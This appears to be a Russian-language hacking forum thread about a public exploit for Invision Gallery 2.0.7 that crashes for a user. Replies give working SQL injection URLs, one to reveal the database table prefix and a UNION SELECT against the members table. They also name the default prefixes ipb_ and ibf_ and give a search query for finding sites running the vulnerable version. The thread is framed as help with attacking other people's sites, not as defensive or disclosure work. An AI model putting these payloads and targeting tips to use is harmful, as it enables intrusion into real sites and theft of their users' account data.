скачал сплойт "Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit" от HellKnights. Откомпилил при попытке заюзать выдает ошибку аля
"Exception 0xc0000005:
Segment violation
Adress: 0x73d5e67d"
и в cmd пишет "abnormal program termination"
В коде сплойта создателями специально допущена ошибка? Вот в общем то помогите решить проблему.
ссылка на сам сплойт (http://www.securitylab.ru/poc/extra/275431.php)

Если не можешь использовать эксплоит, учись разбирать его и делай все вручную.
Как видно из исходника, здесь присутствуют 2 уязвимости. sql-injection и readfile().
ReadFile() мы трогать не будем, тут и так все понятно.
Рассмотрим sql-injection.
Для начала узнаем префикс таблиц в бд:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew
Теперь используем багу так:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1+union+select+1,1,1,1,1,1,1,1,1+from+prefix_membe rs+where+id=id

вместо prefix и id подставляем соответствующие значения.
Как видишь, ничего сложного \=

Можно два глупых вопроса ? :confused: ))

вместо prefix и id подставляем соответствующие значения.

что такое Префикс ???

и как в поисковиках писать что бы найти "Invision Gallery => 2.0.7" :confused: ???

префикс по дэфолту обычно или ipb_ или ibf_

http://www.google.com/search?hl=en&q=Invision+Gallery+2.0.7+%C2%A9+2007++IPS%2C+Inc.&btnG=Search

клозед. вопрос исчерпан.